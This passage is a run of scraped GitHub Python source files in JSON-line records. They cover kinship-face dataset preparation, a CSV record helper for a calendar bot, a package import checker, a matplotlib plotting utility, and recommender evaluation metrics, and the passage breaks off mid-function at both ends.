[['mother','son'], ['son','mother']], 'M-D': [['mother','daughter'], ['daughter','mother']]}\n\n# subsets2attr = {'F-D': [['father','daughter'], ['daughter','father']]}\n\nsubjects = pd.read_csv(subject_detail, sep='\\t')\nfiles = pd.read_csv(file_detail, sep='\\t')\nkin_label = pd.read_csv(kin_label, sep=',')\n\nprint(subjects)\nprint(files)\n\n# shuffle kin_label\nkin_label = kin_label.sample(frac=1).reset_index(drop=True)\nprint(kin_label)\n\nsubj_1_code = []\nsubj_2_code = []\nkin_type = []\n\nfor index, row in kin_label.iterrows():\n for key, attr in subsets2attr.items():\n if [row['subj_1_kinship'],row['subj_2_kinship']] == attr[0]:\n subj_1_code.append(row['subj_1_code'])\n subj_2_code.append(row['subj_2_code'])\n kin_type.append(key)\n elif len(attr)>1:\n if [row['subj_1_kinship'],row['subj_2_kinship']] == attr[1]:\n subj_1_code.append(row['subj_2_code'])\n subj_2_code.append(row['subj_1_code'])\n kin_type.append(key)\n\nlabels = pd.DataFrame(data={'subj_1_code':subj_1_code, 'subj_2_code':subj_2_code, 'kin_type':kin_type})\nlabels = labels.sample(frac=1).reset_index(drop=True)\nprint(labels)\n\ntrain_split = labels.iloc[:int(len(labels)*0.8)]\nprint(train_split)\n# val_split = labels.iloc[int(len(labels)*0.6):int(len(labels)*0.8)]\n# print(val_split)\ntest_split = labels.iloc[int(len(labels)*0.8):]\nprint(test_split)\n\n\ndef get_subjects(split):\n subjects = set([i for i in split['subj_1_code']]+[i for i in split['subj_2_code']])\n return subjects\n\ntrain_subjects = get_subjects(train_split)\n# val_subjects = get_subjects(val_split)\ntest_subjects = get_subjects(test_split)\n\nprint(train_subjects)\n# print(val_subjects)\nprint(test_subjects)\n\n\ndef pair_negative(split, neg_subjects):\n neg_codes = subjects.where(subjects['subject code'].isin(neg_subjects)).dropna().astype({'subject code':'int32', 'age':'int32'})\n neg_list = []\n for index, row in split.iterrows():\n pos = subjects.loc[subjects['subject code']==row['subj_2_code']]\n # negs = neg_codes.where((neg_codes['gender'] != pos['subject code'].iloc[0]) & (neg_codes['gender'] == pos['gender'].iloc[0]) & (abs(neg_codes['age']-pos['age'].iloc[0]) < 10))['subject code'].dropna().astype({'subject code':'int32'}).values.tolist()\n negs = neg_codes.where(\n (neg_codes['gender'] != pos['subject code'].iloc[0]))['subject code'].dropna().astype(\n {'subject code': 'int32'}).values.tolist()\n neg_list.append(negs)\n return neg_list\n\n\ntest_neg = pair_negative(test_split, test_subjects)\n# val_neg = pair_negative(val_split, val_subjects.difference(test_subjects))\n# train_neg = pair_negative(train_split, train_subjects.difference(val_subjects).difference(test_subjects))\ntrain_neg = pair_negative(train_split, train_subjects.difference(test_subjects))\n\nprint(test_neg)\n# print(val_neg)\nprint(train_neg)\n\n\ndef pair_triplets(split, negs):\n triplets = []\n for idx, (i, row) in enumerate(split.iterrows()):\n anchor = row['subj_1_code']\n anchor = files.loc[files['subject code'] == anchor]['filename'].iloc[0]\n pos = row['subj_2_code']\n pos = files.loc[files['subject code'] == pos]['filename'].iloc[0]\n neg = random.choice(negs[idx])\n neg = files.loc[files['subject code'] == neg]['filename'].iloc[0]\n triplets.append([anchor, pos, neg])\n return triplets\n\n\ntrainset = pair_triplets(train_split, train_neg)\nrandom.shuffle(trainset)\nprint(trainset)\nprint(len(trainset))\nnp.save('train.npy', trainset)\n# valset = pair_triplets(val_split, val_neg)\n# random.shuffle(valset)\n# print(valset)\n# print(len(valset))\n# np.save('val.npy', valset)\ntestset = pair_triplets(test_split, test_neg)\nrandom.shuffle(testset)\nprint(testset)\nprint(len(testset))\nnp.save('test.npy', testset)","repo_name":"hx-Tang/videokinface","sub_path":"utils/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70508297845","text":"import os\nimport pandas as pd\n\n\npath2df = 'data/records.csv'\n\ndf = pd.DataFrame(columns=[\n 'date',\n 'user_name',\n 'user_id',\n 'general_grade',\n 'emoji',\n 'description'\n]) if not os.path.isfile(path2df) else pd.read_csv(path2df)\n\n\ndef df_append(date: int, user_name: str, user_id: int, general_grade, emoji, description):\n df.loc[df.shape[0]] = [date, user_name, user_id, general_grade, emoji, description]\n df.to_csv(path2df, index=False, encoding='utf-8')\n\n\ndef df_delete(user_id: int):\n clear_df = df\n if df[df['user_id'] == user_id].shape[0] != 0:\n clear_df = df.drop([df.index[df['user_id'] == user_id].tolist()[-1]])\n clear_df.to_csv(path2df, index=False, encoding='utf-8')\n\n\ndef df_show(user_id: int):\n slice_df = df[df['user_id'] == user_id]\n path2slice = f'data/slices/{user_id}.csv'\n slice_df.to_csv(path2slice, index=False)\n return path2slice\n","repo_name":"Krabomraz/CalendarBot","sub_path":"database_collector.py","file_name":"database_collector.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7621869412","text":"\nfrom pycamia import info_manager\n__info__ = info_manager(\n project = \"PyCAMIA\",\n fileinfo = \"File to check whether the module imports are required in __init__ file.\",\n help = \"Use `python check_import.py packagename` to check the python files. \"\n)\n\nimport sys, os\nwith __info__:\n from pycamia import Path, touch, Error, enclosed_object\n\nhome_path = os.pardir\nbuiltin_module_names = list(sys.builtin_module_names) + \"\"\"\nabs builtins collections copy datetime functools inspect itertools logging math\nnumbers operator os random re shutil string sys threading time types typing warnings\n__future__\n\"\"\".split()\n\ndef do_package(name):\n init_path = os.path.join(home_path, name, \"__init__.py\")\n with open(init_path) as fp: code = fp.read()\n s = touch(lambda: code.index(\"info_manager(\"))\n if s is None: raise Error(\"Pack\")(\"Please use info_manager in `__init__.py` to identify the basic information. \")\n info_str = enclosed_object(code, start=s)\n info = info_manager.parse(info_str)\n\n used_modules = []\n for f in Path(home_path, name).files():\n if f | 'py':\n with f.open() as fp:\n in_special = []\n for l in fp.read().split('\\n'):\n indent = 0\n for c in l:\n if c in ' \\t': indent += 1\n else: break\n l = l.strip()\n if 'if' in l and \"__name__\" in l and \"__main__\" in l: break\n if not l: continue\n if in_special:\n if indent <= in_special[-1][1] and not in_special[-1][0].startswith('str'): in_special.pop(-1); continue\n elif l.startswith('\"\"\"') and in_special[-1][0] == 'str\"': in_special.pop(-1); continue\n elif l.startswith(\"'''\") and in_special[-1][0] == \"str'\": in_special.pop(-1); continue\n if in_special and in_special[-1][0].startswith('str'): continue\n elif l.startswith('if') or l.startswith('elif') or l.startswith('else'):\n in_special.append(('if', indent)); continue\n elif l.startswith('try'):\n in_special.append(('try', indent)); continue\n elif l.startswith('\"\"\"'):\n in_special.append(('str\"', indent)); continue\n elif l.startswith(\"'''\"):\n in_special.append((\"str'\", indent)); continue\n elif l.endswith(':'):\n in_special.append(('unknown', indent))\n if in_special and in_special[-1][0] != 'unknown': continue\n if l.startswith('import '):\n for x in l[len('import '):].split(','):\n module = x.split('as')[0].strip().split('.')[0]\n if not module: continue\n p = (module, f)\n if p not in used_modules: used_modules.append(p)\n elif l.startswith('from ') and 'import' in l:\n module = l[len('from '):].split('import')[0].strip().split('.')[0]\n if not module: continue\n p = (module, f)\n if p not in used_modules: used_modules.append(p)\n extra_modules = []\n for module, p in used_modules:\n if module in builtin_module_names: continue\n if module in info.requires: continue\n if module == name: continue\n extra_modules.append((module, p - Path._curdir))\n return dict(extra_modules)\n\ndef check_import(*package_names):\n if len(package_names) == 1 and isinstance(package_names[0], (list, tuple)):\n package_names = package_names[0]\n if len(package_names) == 0: package_names = ['all']\n\n res = []\n if 'all' in package_names:\n if len(package_names) > 1:\n print(\"Warning: Indicator 'all' was found as long as ordinary package names. \")\n r = input(\"Shall we go on for all available packages? (Y/N)\")\n if 'y' not in r.lower(): exit()\n for name in os.listdir(home_path):\n cpath = os.path.join(home_path, name)\n if os.path.isdir(cpath):\n if \"__init__.py\" in os.listdir(cpath) and \".ignore_pack\" not in os.listdir(cpath):\n res.append(do_package(name))\n else:\n for pn in package_names:\n if '==' in pn: pn = pn.split('==')[0]\n if os.path.exists(os.path.join(home_path, pn)):\n res.append(do_package(pn))\n else: print(f\"Warning: Package '{pn}' not found. \")\n \n return res\n\nif __name__ == \"__main__\":\n plist = sys.argv[1:]\n if len(plist) == 0:\n for name in os.listdir(home_path):\n cpath = os.path.join(home_path, name)\n if os.path.isdir(cpath):\n if \"__init__.py\" in os.listdir(cpath) and \".ignore_pack\" not in os.listdir(cpath):\n print(name, check_import(name)[0])\n else:\n for a, b in zip(plist, check_import(plist)):\n print(a, b)\n","repo_name":"Bertie97/PyCAMIA","sub_path":"packing/check_import.py","file_name":"check_import.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9430759982","text":"import multiprocessing\nimport re\nimport threading\nimport warnings\nfrom enum import Enum, auto\nfrom typing import Optional, Union\n\nimport matplotlib\nimport numpy as np\nfrom matplotlib import pyplot as plt, pylab\nfrom matplotlib.backend_bases import FigureManagerBase\nfrom pymoo.core.plot import Plot\n\nfrom logger import fatal, warn, verbose\nfrom utils_date import getNowStr\nfrom utils_fs import createFolder, pathJoin\nfrom utils_misc import getRunIdStr, runWithExpRetry, size\n\n\nclass PlotMode(Enum):\n BLOCKING_SHOW = auto()\n NON_BLOCKING_SHOW = auto()\n SAVE_TO_FILE = auto()\n DONT_PLOT = auto()\n\n def __str__(self) -> str:\n return self.name\n\n @staticmethod\n def getAll():\n return list(map(lambda c: c, PlotMode))\n\n\nLOCK_TO_PLOT = True\nDEFAULT_PLOT_MODE = PlotMode.SAVE_TO_FILE\nDEFAULT_BACKEND = None\nMAIN_THREAD_FIGURE_MANAGER = None\nSAVE_FILE_BACKEND = 'Agg'\nSAVED_PLOTS_PATH = 'saved_plots'\nFIGURE_EXTRA_WIDTH_RATIO_FOR_LEGEND = 1.1\nFIGURE_WIDTH = 1920\nFIGURE_HEIGHT = 1080\nFIGURE_DPI = 150\nFIGURE_LEGEND_X_ANCHOR = 1.0\nFIGURE_LEGEND_Y_ANCHOR = 0.5\n\n\nclass VarsHolder(object):\n _saved_plots_counter = None\n _had_a_non_blocking = None\n _lock = None\n _current_backend = DEFAULT_BACKEND\n\n @staticmethod\n def getSavedPlotsCounter() -> int:\n if VarsHolder._saved_plots_counter is None:\n VarsHolder._saved_plots_counter = 0\n return VarsHolder._saved_plots_counter\n\n @staticmethod\n def getSavedPlotsCounter() -> bool:\n if VarsHolder._had_a_non_blocking is None:\n VarsHolder._had_a_non_blocking = False\n return VarsHolder._had_a_non_blocking\n\n @staticmethod\n def maybeSetLock(lock: Union[threading.Lock, multiprocessing.Lock]):\n if VarsHolder._lock is None:\n VarsHolder._lock = lock\n\n @staticmethod\n def getLock(lock: Optional[Union[threading.Lock, multiprocessing.Lock]]) -> \\\n Optional[Union[threading.Lock, multiprocessing.Lock]]:\n if VarsHolder._lock is not None:\n VarsHolder.maybeSetLock(lock)\n return VarsHolder._lock\n\n @staticmethod\n def getCurrentBackend() -> str:\n if VarsHolder._current_backend is not None:\n VarsHolder._current_backend = DEFAULT_BACKEND\n return VarsHolder._current_backend\n\n\ndef getDefaultBackend():\n global DEFAULT_BACKEND\n if DEFAULT_BACKEND is None:\n DEFAULT_BACKEND = matplotlib.get_backend()\n return DEFAULT_BACKEND\n\n\ndef setCurrentBackend(backend: str):\n VarsHolder._current_backend = backend\n\n\ndef getCurrentBackend() -> str:\n if VarsHolder._current_backend is None:\n setCurrentBackend(getDefaultBackend())\n return VarsHolder._current_backend\n\n\ndef getPlotColorFromIndex(idx: int, colours_to_avoid: Optional[Union[list, str]] = None) -> str:\n # https://matplotlib.org/stable/gallery/color/named_colors.html\n # background = 'w'\n all_colours = ['b', 'g', 'r', 'c', 'y', 'tab:gray', 'tab:pink', 'tab:brown', 'tab:purple', 'tab:orange',\n 'chartreuse', 'm', 'cornflowerblue', 'darkviolet', 'crimson', 'fuchsia', 'salmon', 'indigo', 'k']\n if colours_to_avoid is not None and type(colours_to_avoid) is str:\n colours_to_avoid = [colours_to_avoid]\n available_colours = []\n for c in all_colours:\n if colours_to_avoid is None or c not in colours_to_avoid:\n available_colours.append(c)\n return available_colours[(idx % len(available_colours))]\n\n\ndef getFigureManager() -> Optional[FigureManagerBase]:\n global MAIN_THREAD_FIGURE_MANAGER\n return MAIN_THREAD_FIGURE_MANAGER\n\n\ndef resizeFigure(width: int = FIGURE_WIDTH, height: int = FIGURE_HEIGHT) -> None:\n getFigureManager().resize(width, height)\n\n\ndef getNextPlotFilepath(prefix: str = 'plot', label: str = '', plot_subdir: Optional[str] = None,\n add_run_id: bool = True, counter_postfix: bool = False, datetime_postfix: bool = False) -> str:\n if prefix.strip() != '':\n prefix += '-'\n postfix = ''\n if counter_postfix:\n postfix += f'-{VarsHolder._saved_plots_counter}'\n VarsHolder._saved_plots_counter += 1\n if datetime_postfix:\n postfix += f'-{getNowStr(output_format=\"%d%m%Y%H%M%S\")}'\n\n filename = f'{prefix}{f\"{label}\" if label else \"\"}{postfix}.png'\n if add_run_id:\n base_path = pathJoin(SAVED_PLOTS_PATH, getRunIdStr())\n createFolder(base_path)\n else:\n base_path = SAVED_PLOTS_PATH\n if plot_subdir is not None:\n base_path = pathJoin(base_path, plot_subdir)\n createFolder(base_path)\n filepath = pathJoin(base_path, filename)\n return filepath\n\n\ndef clearCurrentFigure() -> None:\n plt.clf()\n plt.cla()\n plt.close() # delete the last and empty figure\n\n\ndef blockPlots() -> None:\n plt.show()\n\n\ndef maybeBlockPlots() -> None:\n if VarsHolder._had_a_non_blocking:\n blockPlots()\n\n\ndef _line(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n if 'style' in plot_args:\n style = plot_args.pop('style')\n plot_data.append(style)\n if size(plot_data) > 0 and size(plot_data[0]) > 0:\n plt.plot(*plot_data, **plot_args)\n return True\n return False\n\n\ndef _scatter(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n if size(plot_data) > 0 and size(plot_data[0]) > 0:\n plt.scatter(*plot_data, **plot_args)\n return True\n return False\n\n\ndef _imshow(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n if 'auto_range' in plot_args:\n plot_args.pop('auto_range')\n plot_data[0] = np.array(plot_data[0])\n plot_args['vmin'] = plot_data[0].min()\n plot_args['vmax'] = plot_data[0].max()\n if 'auto_range_factors' in plot_args:\n fmin, fmax = plot_args.pop('auto_range_factors')\n plot_args['vmin'] *= fmin\n plot_args['vmax'] *= fmax\n if size(plot_data) > 0 and size(plot_data[0]) > 0:\n plt.imshow(*plot_data, **plot_args)\n return True\n return False\n\n\ndef _colorbar(_: Union[list, np.ndarray], plot_args: dict) -> bool:\n plt.colorbar(**plot_args)\n return True\n\n\ndef _suptitle(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n plt.suptitle(*plot_data, **plot_args)\n return True\n\n\ndef _axhline(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n plt.axhline(*plot_data, **plot_args)\n return True\n\n\ndef _axvline(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n plt.axvline(*plot_data, **plot_args)\n return True\n\n\ndef _text(plot_data: Union[list, np.ndarray], plot_args: dict) -> bool:\n plt.text(*plot_data, **plot_args)\n return True\n\n\ndef maybeSetFigureManager():\n global MAIN_THREAD_FIGURE_MANAGER\n if MAIN_THREAD_FIGURE_MANAGER is None and threading.current_thread() is threading.main_thread():\n MAIN_THREAD_FIGURE_MANAGER = plt.get_current_fig_manager()\n\n\ndef getColorGradientsFromIndex(i: int, for_confusion_matrix: bool = False) -> str:\n if for_confusion_matrix:\n cmaps = ['bwr', 'seismic', 'Blues', 'OrRd']\n else:\n cmaps = ['Accent', 'Accent_r', 'Blues', 'Blues_r', 'BrBG', 'BrBG_r', 'BuGn', 'BuGn_r', 'BuPu', 'BuPu_r',\n 'CMRmap', 'CMRmap_r', 'Dark2', 'Dark2_r', 'GnBu', 'GnBu_r', 'Greens', 'Greens_r', 'Greys', 'Greys_r',\n 'OrRd', 'OrRd_r', 'Oranges', 'Oranges_r', 'PRGn', 'PRGn_r', 'Paired', 'Paired_r', 'Pastel1',\n 'Pastel1_r', 'Pastel2', 'Pastel2_r', 'PiYG', 'PiYG_r', 'PuBu', 'PuBuGn', 'PuBuGn_r', 'PuBu_r', 'PuOr',\n 'PuOr_r', 'PuRd', 'PuRd_r', 'Purples', 'Purples_r', 'RdBu', 'RdBu_r', 'RdGy', 'RdGy_r', 'RdPu',\n 'RdPu_r', 'RdYlBu', 'RdYlBu_r', 'RdYlGn', 'RdYlGn_r', 'Reds', 'Reds_r', 'Set1', 'Set1_r', 'Set2',\n 'Set2_r', 'Set3', 'Set3_r', 'Spectral', 'Spectral_r', 'Wistia', 'Wistia_r', 'YlGn', 'YlGnBu',\n 'YlGnBu_r', 'YlGn_r', 'YlOrBr', 'YlOrBr_r', 'YlOrRd', 'YlOrRd_r', 'afmhot', 'afmhot_r', 'autumn',\n 'autumn_r', 'binary', 'binary_r', 'bone', 'bone_r', 'brg', 'brg_r', 'bwr', 'bwr_r', 'cividis',\n 'cividis_r', 'cool', 'cool_r', 'coolwarm', 'coolwarm_r', 'copper', 'copper_r', 'cubehelix',\n 'cubehelix_r', 'flag', 'flag_r', 'gist_earth', 'gist_earth_r', 'gist_gray', 'gist_gray_r', 'gist_heat',\n 'gist_heat_r', 'gist_ncar', 'gist_ncar_r', 'gist_rainbow', 'gist_rainbow_r', 'gist_stern',\n 'gist_stern_r', 'gist_yarg', 'gist_yarg_r', 'gnuplot', 'gnuplot2', 'gnuplot2_r', 'gnuplot_r', 'gray',\n 'gray_r', 'hot', 'hot_r', 'hsv', 'hsv_r', 'icefire', 'icefire_r', 'inferno', 'inferno_r', 'jet',\n 'jet_r', 'magma', 'magma_r', 'mako', 'mako_r', 'nipy_spectral', 'nipy_spectral_r', 'ocean', 'ocean_r',\n 'pink', 'pink_r', 'plasma', 'plasma_r', 'prism', 'prism_r', 'rainbow', 'rainbow_r', 'rocket',\n 'rocket_r', 'seismic', 'seismic_r', 'spring', 'spring_r', 'summer', 'summer_r', 'tab10', 'tab10_r',\n 'tab20', 'tab20_r', 'tab20b', 'tab20b_r', 'tab20c', 'tab20c_r', 'terrain', 'terrain_r', 'viridis',\n 'viridis_r', 'vlag', 'vlag_r', 'winter', 'winter_r']\n return cmaps[i % len(cmaps)]\n\n\ndef getLock() -> threading.Lock:\n # this should not be need, since we use multiprocess\n if VarsHolder._lock is None:\n VarsHolder._lock = multiprocessing.Lock() # threading.Lock()\n return VarsHolder._lock\n\n\ndef maybeLock(context: str) -> threading.Lock:\n lock = getLock()\n if LOCK_TO_PLOT:\n verbose(f'Acquiring lock to plot - {context}!', False)\n lock.acquire()\n return lock\n\n\ndef maybeUnlock(context: str, lock: threading.Lock):\n if LOCK_TO_PLOT:\n verbose(f'Releasing lock to plot - {context}!', False)\n lock.release()\n return lock\n\n\ndef plot(plots: Union[tuple[str, list, dict], list[tuple[str, list, dict]]], mode: Optional[PlotMode] = None,\n title: Optional[str] = None, x_label: Optional[Union[str, tuple[str, dict]]] = None,\n y_label: Optional[Union[str, tuple[str, dict]]] = None, legend: Union[bool, str, dict] = False,\n legend_outside: Union[bool, float] = False, tight_layout: bool = True,\n resize: Union[bool, tuple[int, int]] = False,\n x_ticks: Optional[tuple[Union[list, np.ndarray, dict], ...]] = None,\n y_ticks: Optional[tuple[Union[list, np.ndarray, dict], ...]] = None, file_label: Optional[str] = None,\n subdir: Optional[str] = None, add_rid_subdir: bool = True, file_prefix: Union[str, bool] = 'plot',\n file_postfix: bool = True, file_datetime_postfix: bool = True, file_counter_postfix: bool = False) -> None:\n current_backend = getCurrentBackend()\n default_backend = getDefaultBackend()\n\n lock = maybeLock(file_label)\n maybeSetFigureManager()\n\n if mode is None:\n mode = DEFAULT_PLOT_MODE\n\n if mode == PlotMode.DONT_PLOT:\n return\n\n if mode in (PlotMode.BLOCKING_SHOW, PlotMode.NON_BLOCKING_SHOW):\n if current_backend != default_backend:\n matplotlib.use(default_backend)\n setCurrentBackend(default_backend)\n elif current_backend != SAVE_FILE_BACKEND:\n matplotlib.use(SAVE_FILE_BACKEND)\n setCurrentBackend(SAVE_FILE_BACKEND)\n if type(plots) is tuple:\n plots = [plots]\n plot_something = False\n for p in plots:\n plot_type = p[0].lower().strip()\n plot_data = p[1]\n plot_args = p[2]\n\n if plot_type in ('plot', 'line'):\n plot_something = _line(plot_data, plot_args) or plot_something\n elif plot_type == 'scatter':\n plot_something = _scatter(plot_data, plot_args) or plot_something\n elif plot_type in ('imshow', 'im'):\n plot_something = _imshow(plot_data, plot_args) or plot_something\n elif plot_type == 'colorbar':\n _colorbar(plot_data, plot_args)\n elif plot_type == 'suptitle':\n _suptitle(plot_data, plot_args)\n elif plot_type == 'axhline':\n _axhline(plot_data, plot_args)\n elif plot_type == 'axvline':\n _axvline(plot_data, plot_args)\n elif plot_type == 'text':\n _text(plot_data, plot_args)\n else:\n fatal(Exception(f'Invalid plot_type: `{plot_type}`'))\n\n if not plot_something:\n return\n\n if title is not None:\n plt.title(title)\n fig = pylab.gcf()\n if fig.canvas.manager is not None:\n fig.canvas.manager.set_window_title(title)\n if x_label is not None:\n if type(x_label) is tuple:\n plt.xlabel(*x_label[:-1], **x_label[-1])\n else:\n plt.xlabel(x_label)\n if y_label is not None:\n if type(y_label) is tuple:\n plt.ylabel(*y_label[:-1], **y_label[-1])\n else:\n plt.ylabel(y_label)\n if x_ticks is not None:\n plt.xticks(*x_ticks[:-1], **x_ticks[-1])\n if y_ticks is not None:\n plt.yticks(*y_ticks[:-1], **y_ticks[-1])\n if tight_layout or (type(legend_outside) is bool and legend_outside) or type(legend_outside) is float:\n warnings.filterwarnings(\"error\")\n try:\n if not legend_outside:\n plt.tight_layout()\n else:\n width = FIGURE_EXTRA_WIDTH_RATIO_FOR_LEGEND\n if type(legend_outside) is float:\n width += legend_outside\n plt.tight_layout(rect=[0, 0, width, 1])\n except Warning as e:\n warn(f'Tight Layout Issue: title: {title} | x_label: {x_label} | y_label: {y_label} | legend: {legend} | '\n f'legend_outside: {legend_outside} | tight_layout: {tight_layout} | file_label: {file_label} | '\n f'subdir: {subdir} | file_prefix: {file_prefix}')\n warn(e)\n warnings.resetwarnings()\n\n if (type(legend_outside) is bool and legend_outside) or type(legend_outside) is float:\n plt.legend(loc='center left', bbox_to_anchor=(FIGURE_LEGEND_X_ANCHOR, FIGURE_LEGEND_Y_ANCHOR))\n elif type(legend) is str:\n plt.legend(legend)\n elif type(legend) is dict:\n plt.legend(**legend)\n elif type(legend) is bool and legend:\n plt.legend()\n\n if (type(resize) is bool and resize) or type(resize) is tuple:\n if type(resize) is tuple:\n resizeFigure(resize[0], resize[1])\n else:\n resizeFigure()\n\n if mode in (PlotMode.BLOCKING_SHOW, PlotMode.NON_BLOCKING_SHOW):\n if mode == PlotMode.BLOCKING_SHOW:\n plt.show(block=True)\n else:\n plt.show(block=False)\n VarsHolder._had_a_non_blocking = True\n clearCurrentFigure() # to clean up, when show not blocking or saving to file\n plt.figure(dpi=FIGURE_DPI)\n else:\n createFolder(SAVED_PLOTS_PATH)\n if type(file_prefix) is bool:\n if file_prefix:\n file_prefix = 'plot'\n else:\n file_prefix = ''\n if not file_postfix:\n file_counter_postfix = file_datetime_postfix = False\n if file_label is None:\n file_label = re.sub(r'\\W+', '', title.replace(' ', '_').lower())\n filepath = getNextPlotFilepath(prefix=file_prefix, label=file_label, plot_subdir=subdir,\n add_run_id=add_rid_subdir, counter_postfix=file_counter_postfix,\n datetime_postfix=file_datetime_postfix)\n\n runWithExpRetry(f'SavePlot-{file_label}', plt.savefig, [filepath], dict(bbox_inches='tight', dpi=FIGURE_DPI),\n 3, raise_it=False)\n clearCurrentFigure() # to clean up, when show not blocking or saving to file\n plt.figure(dpi=FIGURE_DPI)\n maybeUnlock(file_label, lock)\n\n\ndef showOrSavePymooPlot(the_plot: Plot, label: str, subsubdir: Optional[str] = None, prefix: str = '') -> None:\n try:\n resizeFigure()\n plot_subdir = 'nas'\n if subsubdir is not None:\n pathJoin(plot_subdir, subsubdir)\n if DEFAULT_PLOT_MODE == PlotMode.SAVE_TO_FILE:\n filepath = getNextPlotFilepath(prefix=prefix, label=label, plot_subdir=plot_subdir,\n add_run_id=True, counter_postfix=False,\n datetime_postfix=False)\n the_plot.save(filepath, dpi=FIGURE_DPI)\n elif DEFAULT_PLOT_MODE in (PlotMode.BLOCKING_SHOW, PlotMode.NON_BLOCKING_SHOW):\n the_plot.show()\n except:\n del the_plot\n\n\ndef getCMap(cmap_name: str) -> object:\n return matplotlib.colormaps[cmap_name]\n\n\nmatplotlib.rcParams['figure.dpi'] = FIGURE_DPI\n","repo_name":"thiagofigcosta/stock-pred-v3","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":16684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27055225650","text":"import pandas as pd\r\ndata={\r\n \r\n 'A':[1,0,1,1],\r\n 'B':[0,2,5,0],\r\n 'C':[4,0,4,4],\r\n 'D':[1,0,1,1]\r\n}\r\ndf=pd.DataFrame(data=data)\r\n#默认保留第一次出现的重复项\r\ndata = pd.DataFrame()\r\ndata['a'] = df['A']\r\nprint(data)","repo_name":"GS233/MyNLPCoding","sub_path":"1.京东爬虫/00.test.py","file_name":"00.test.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9937074542","text":"import math\nfrom collections import OrderedDict\nimport numpy as np\n\nfrom utils.stats import Statistics\nfrom .. import HOLDOUT_METRICS\n# from evaluation.backend import HOLDOUT_METRICS\n\n# HOLDOUT_METRICS = ['Prec', 'Recall', 'NDCG']\n\ndef compute_holdout_metrics_py(pred, target, ks):\n score_cumulator = OrderedDict()\n for metric in HOLDOUT_METRICS:\n score_cumulator[metric] = {k: Statistics('%s@%d' % (metric, k)) for k in ks}\n \n hits = []\n for idx, u in enumerate(target):\n pred_u = pred[idx]\n target_u = target[u]\n num_target_items = len(target_u)\n for k in ks:\n pred_k = pred_u[:k]\n hits_k = [(i + 1, item) for i, item in enumerate(pred_k) if item in target_u]\n num_hits = len(hits_k)\n\n idcg_k = 0.0\n for i in range(1, min(num_target_items, k) + 1):\n idcg_k += 1 / math.log(i + 1, 2)\n\n dcg_k = 0.0\n for idx, item in hits_k:\n dcg_k += 1 / math.log(idx + 1, 2)\n \n prec_k = num_hits / k\n recall_k = num_hits / num_target_items\n ndcg_k = dcg_k / idcg_k\n\n score_cumulator['Prec'][k].update(prec_k)\n score_cumulator['Recall'][k].update(recall_k)\n score_cumulator['NDCG'][k].update(ndcg_k)\n \n hits.append(len(hits_k))\n return score_cumulator\n\n# class HoldoutEvaluator:\n# def __init__(self, top_k, eval_pos, eval_target, eval_neg_candidates=None):\n# self.top_k = top_k\n# self.max_k = max(top_k)\n# self.eval_pos = eval_pos\n# self.eval_target = eval_target\n# self.eval_neg_candidates = eval_neg_candidates\n\n# def init_score_cumulator(self):\n# score_cumulator = OrderedDict()\n# for metric in ['Prec', 'Recall', 'NDCG']:\n# score_cumulator[metric] = {k: Statistics('%s@%d' % (metric, k)) for k in self.top_k}\n# return score_cumulator\n\n# def compute_metrics(self, topk, target, score_cumulator=None):\n# if score_cumulator is None:\n# score_cumulator = self.init_score_cumulator()\n\n# hits = []\n# for idx, u in enumerate(target):\n# pred_u = topk[idx]\n# target_u = target[u]\n# num_target_items = len(target_u)\n# for k in self.top_k:\n# pred_k = pred_u[:k]\n# hits_k = [(i + 1, item) for i, item in enumerate(pred_k) if item in target_u]\n# num_hits = len(hits_k)\n\n# idcg_k = 0.0\n# for i in range(1, min(num_target_items, k) + 1):\n# idcg_k += 1 / math.log(i + 1, 2)\n\n# dcg_k = 0.0\n# for idx, item in hits_k:\n# dcg_k += 1 / math.log(idx + 1, 2)\n\n# if num_hits:\n# pass\n \n# prec_k = num_hits / k\n# recall_k = num_hits / min(num_target_items, k)\n# ndcg_k = dcg_k / idcg_k\n\n# score_cumulator['Prec'][k].update(prec_k)\n# score_cumulator['Recall'][k].update(recall_k)\n# score_cumulator['NDCG'][k].update(ndcg_k)\n \n# hits.append(len(hits_k))\n# return score_cumulator","repo_name":"yoongi0428/RecSys_PyTorch","sub_path":"evaluation/backend/python/holdout.py","file_name":"holdout.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"76"} +{"seq_id":"73274391926","text":"def userInput(ks_db, graphics, df, min_sub):\n\n import io\n from io import StringIO\n import pandas as pd\n import scipy.stats as st\n import numpy as np\n\n if graphics == \"yes\":\n import matplotlib as mpl\n mpl.use('Agg')\n import matplotlib.pyplot as plt\n from mpl_toolkits.axes_grid1 import axes_size\n from mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\n from mpl_toolkits.axes_grid1.axes_size import AxesY, Fraction\n from mpl_toolkits.axes_grid1.colorbar import colorbar\n import seaborn as sns\n\n # Function that returns the Kolmogorov-Smirnov test statistic along with the p-value.\n # -log10 of p-value is also calculated for the barplot.\n def ksTest(substrates, non_substrates):\n result = st.ks_2samp(substrates, non_substrates)\n ks_stat = result[0]\n pval = result[1]\n log_pval = np.log10(1/pval)\n return ks_stat, pval, log_pval\n\n # Convert JSON-string datatset back into a DF.\n df = pd.read_json(df, orient=\"split\")\n \n # User data is passed from the server and parsed as appropriate.\n user_file = df.values.tolist()\n header = df.columns.values.tolist()\n col_length=len(header)\n array=[]\n for line in user_file:\n if line == 